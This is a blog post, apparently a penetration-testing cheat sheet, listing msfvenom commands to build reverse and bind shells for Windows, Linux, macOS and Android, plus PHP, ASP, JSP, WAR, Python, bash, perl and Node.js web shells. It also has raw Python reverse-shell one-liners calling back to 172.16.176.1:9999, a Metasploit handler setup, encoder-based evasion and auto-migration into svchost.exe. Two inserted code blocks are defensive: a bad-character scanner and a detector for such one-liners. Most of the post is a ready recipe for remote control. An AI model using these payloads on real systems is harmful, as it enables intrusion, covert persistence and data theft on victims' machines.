Generating payloads with msfvenom
ssooking

Important msfvenom options

List payloads: msfvenom -l payloads
List supported output formats: msfvenom -l formats
List the options a payload requires: msfvenom -p xxx --list-options
List encoders: msfvenom --list encoders
Example of the encoding options:

-e x86/shikata_ga_nai -i 5 -b '\x00\x0A\x0D'   // encode 5 times with the shikata_ga_nai encoder and strip the bad characters that would truncate the payload

Remember to add the -b option when generating shellcode.

msfvenom -a x86 -p windows/messagebox TEXT="Exploit test!" -e x86/shikata_ga_nai -i 5 -b '\x00\x0A\x0D' -f raw
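The reason -b matters is that the bytes in the -b list are the ones a typical delivery path silently cuts off: a C-string copy stops at the first 0x00, a line-oriented reader stops at 0x0A/0x0D. The following added example (my code, not the post's and not msfvenom's) parses an msfvenom-style -b argument, reports where those bytes sit in a blob, and simulates both kinds of truncation. SAMPLE_BLOB is constructed filler, not real shellcode; the function names are my own.

```python
"""
Added example (not part of the original post): parse an msfvenom-style -b
argument, scan a raw payload blob for those bad characters, and show why a
stray NUL or newline breaks delivery. SAMPLE_BLOB is constructed filler,
not real shellcode; the function names are assumptions made for this example.
"""
from typing import Dict, List


def parse_badchars_arg(arg: str) -> bytes:
    """Turn the literal text given to -b (e.g. r'\\x00\\x0A\\x0D') into bytes.

    If the text contains no \\x escapes it is taken as literal characters.
    """
    if "\\x" not in arg:
        return arg.encode("latin-1")
    parts = [p for p in arg.split("\\x") if p]
    return bytes(int(p, 16) for p in parts)


def find_bad_chars(blob: bytes, bad: bytes) -> Dict[int, List[int]]:
    """Map each bad byte value present in blob to the offsets where it occurs."""
    hits: Dict[int, List[int]] = {}
    for offset, value in enumerate(blob):
        if value in bad:
            hits.setdefault(value, []).append(offset)
    return hits


def c_string_truncate(blob: bytes) -> bytes:
    """What a strcpy()/strlen()-style consumer keeps: everything before the first NUL."""
    nul = blob.find(b"\x00")
    return blob if nul < 0 else blob[:nul]


def line_truncate(blob: bytes) -> bytes:
    """What a line-oriented reader (fgets, readline) keeps: everything before the first CR or LF."""
    cut = len(blob)
    for sep in (b"\x0a", b"\x0d"):
        pos = blob.find(sep)
        if pos >= 0:
            cut = min(cut, pos)
    return blob[:cut]


# Same bad-character list the post passes to -b.
BAD = parse_badchars_arg(r"\x00\x0A\x0D")

# Constructed, meaningless bytes that happen to contain one of each bad character.
SAMPLE_BLOB = b"\x90\x90\x31\xc0\x00\x50\x68\x0a\x0d\x41\x42"

# The same blob with the bad bytes removed (what an encoder run with -b must achieve).
CLEAN_BLOB = bytes(b for b in SAMPLE_BLOB if b not in BAD)

if __name__ == "__main__":
    print("bad bytes at offsets:", find_bad_chars(SAMPLE_BLOB, BAD))
    print("kept after C-string copy:", c_string_truncate(SAMPLE_BLOB).hex())
    print("kept after line read:", line_truncate(SAMPLE_BLOB).hex())
    print("clean blob survives intact:", c_string_truncate(CLEAN_BLOB) == CLEAN_BLOB)
```

Run it on the output of msfvenom -f raw (read the file as bytes and pass it to find_bad_chars) to confirm that an encoded payload really is free of the bytes you listed in -b before embedding it anywhere; an empty result from find_bad_chars is the pass condition.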

Commonly used payloads

windows/exec cmd=calc.exe
windows/shell_bind_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/meterpreter_reverse_tcp

System Payloads

The examples below use a TCP reverse shell.

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=123.207.15.73 LPORT=9999 -f elf -o shell.elf

Windows

messagebox test

msfvenom -a x86 -p windows/messagebox Title="ssooking" TEXT="hello, it is a test" -f exe -o hello.exe
msfvenom -p windows/messagebox Title="ssooking" TEXT="hello, it is a test" -f exe -o hello.exe   # 64-bit

When generating a 32-bit or 64-bit payload for Windows, make sure the architecture matches the target system.

msfvenom -a x86 --platform windows -p windows/shell_bind_tcp RHOST=xxx RPORT=xxx -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe -o shell.exe

Take windows/meterpreter/reverse_tcp as an example: this payload is 32-bit by default, which can also be stated explicitly with the -a x86 option.

To generate a 64-bit payload, use windows/x64/meterpreter/reverse_tcp instead.

Netcat

nc forward (bind) connection

msfvenom -p windows/shell_hidden_bind_tcp LPORT=xxx AHOST=xxx -f exe -o 1.exe

AHOST: the host that is allowed to connect

nc reverse connection

msfvenom -p windows/shell_reverse_tcp LHOST=xxx LPORT=xxx -f exe -o 1.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=xxx LPORT=xxx -f macho -o shell.macho

Android

msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.apk

Web Payloads

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

The second line prepends an opening <?php tag to the generated file (pbcopy/pbpaste are the macOS clipboard tools).

asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f asp -o shell.asp

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f war -o shell.war

python

msfvenom -p cmd/unix/reverse_python LHOST=xxx LPORT=xxx -f raw -o shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.py

Forward shell

python/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

python/python3 -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('172.16.176.1',9999))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
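From the defender's side, the inline Python one-liners above leave a distinctive process command line: an interpreter started with -c whose code opens a socket, calls connect(), and then either redirects file descriptors with os.dup2 or spawns a shell through subprocess. The following added example (my code, not the post's) runs that logic over constructed process-creation records and also pulls the connect() destination out of a matching command line for follow-up. The record field names (pid, user, cmdline) are assumptions; the two positive samples are the one-liners from the post, the rest are benign uses of python -c that must not alert.

```python
"""
Added example (not part of the original post): flag process-creation records
whose command line matches the shape of an inline Python reverse-shell
one-liner, and extract the destination it connects to. The event field names
are assumptions; SAMPLE_EVENTS are constructed, not real telemetry.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample records. The first two command lines are the one-liners
# quoted in the post; the remaining ones are benign and must not alert.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "4120", "user": "www-data", "cmdline": r"""python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""},
    {"pid": "4121", "user": "www-data", "cmdline": r'''python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('172.16.176.1',9999))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"'''},
    {"pid": "900", "user": "deploy", "cmdline": "python3 -c 'import socket; print(socket.gethostname())'"},
    {"pid": "901", "user": "deploy", "cmdline": "/usr/bin/python3 manage.py runserver 0.0.0.0:8000"},
    {"pid": "902", "user": "deploy", "cmdline": "python3 -c 'import subprocess; print(subprocess.check_output([\"uname\",\"-r\"]))'"},
]

# "python -c", "python3.11 -c", "/usr/bin/python -c", with optional flags before -c.
INLINE_PY = re.compile(r"(?:^|/)python[0-9.]*\s+(?:\S+\s+)*-c\s", re.IGNORECASE)

# Building blocks of "open a TCP connection and hand a shell to it".
INDICATORS = {
    "socket_connect": re.compile(r"socket\s*\(.*\.connect\s*\(", re.DOTALL),
    "fd_redirect": re.compile(r"os\.dup2\s*\("),
    "shell_spawn": re.compile(r"subprocess\.(?:call|Popen)\s*\(|pty\.spawn\s*\("),
    "shell_true": re.compile(r"shell\s*=\s*True"),
}

# connect(("host", port)) or connect(('host',port)) -> the remote endpoint.
CONNECT_DEST = re.compile(r"connect\s*\(\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)")


def classify_cmdline(cmdline: str) -> List[str]:
    """Return the indicator names present; empty list means "not inline-python-shell shaped"."""
    if not INLINE_PY.search(cmdline):
        return []
    reasons = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # Alert only when the network half and at least one shell half are both present.
    if "socket_connect" not in reasons:
        return []
    if not ({"fd_redirect", "shell_spawn"} & set(reasons)):
        return []
    return reasons


def extract_destination(cmdline: str) -> Optional[Tuple[str, int]]:
    """Pull (host, port) out of the connect() call, if it is written as a literal."""
    m = CONNECT_DEST.search(cmdline)
    return (m.group(1), int(m.group(2))) if m else None


def detect_inline_python_shells(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the classifier over event records and return one finding per hit."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        reasons = classify_cmdline(ev.get("cmdline", ""))
        if reasons:
            findings.append({
                "pid": ev.get("pid"),
                "user": ev.get("user"),
                "reasons": reasons,
                "destination": extract_destination(ev["cmdline"]),
            })
    return findings


if __name__ == "__main__":
    for f in detect_inline_python_shells(SAMPLE_EVENTS):
        print(f"pid={f['pid']} user={f['user']} dest={f['destination']} reasons={f['reasons']}")
```

The two halves are checked separately on purpose: plenty of legitimate python -c invocations import socket or subprocess alone, so requiring a connect() plus either fd redirection or a shell spawn keeps the rule quiet on the benign samples while still catching both variants in the post. The extracted destination is the natural pivot to network logs for the same host and port.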

bash

msfvenom -p cmd/unix/reverse_bash LHOST=xxx LPORT=xxx -f raw -o shell.sh

perl

msfvenom -p cmd/unix/reverse_perl LHOST=xxx LPORT=xxx -f raw -o shell.pl

nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.js

MSF listener

use exploit/multi/handler
set PAYLOAD <Payload name>
set RHOST <RHOST value>
set RPORT <RPORT value>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Starting a listener directly in one line

msf5 > handler -H <RHOST/LHOST> -P <RPORT/LPORT> -p windows/meterpreter/reverse_tcp

Other settings

Auto-run script

For example, auto-run the post/windows/manage/migrate module, which injects the session into another process:

set AutoRunScript post/windows/manage/migrate

Auto-migrate into a process

set prependmigrate true
set prependmigrateProc svchost.exe

PS: some of these advanced options can already be set when generating the trojan with msfvenom, e.g. directly generating one that automatically migrates into svchost.exe:

msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -e x86/shikata_ga_nai -i 5 -b '\x00\x0A\x0D' PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe

Advanced handler configuration

Use show advanced to view the advanced options:

set exitonsession false   // keep the listening port open after a session is established, so multiple sessions can be accepted
set stagerverifysslcert false   // avoid the SSL_accept error that can appear when obtaining a shell
set SessionCommunicationTimeout 0   // prevent the session from being killed after a long idle period (default 300 seconds, i.e. 5 minutes)
set SessionExpirationTimeout 0   // prevent the session from being forcibly closed (default lifetime 604800 seconds, i.e. one week)
  • Post title: Generating payloads with msfvenom
  • Post author: ssooking
  • Create time: 2016-11-15 17:22:00
  • Post link: https://ssooking.github.io/2016/11/msfvenom生成payload/
  • Copyright Notice: All articles in this blog are licensed under BY-NC-SA unless stated otherwise.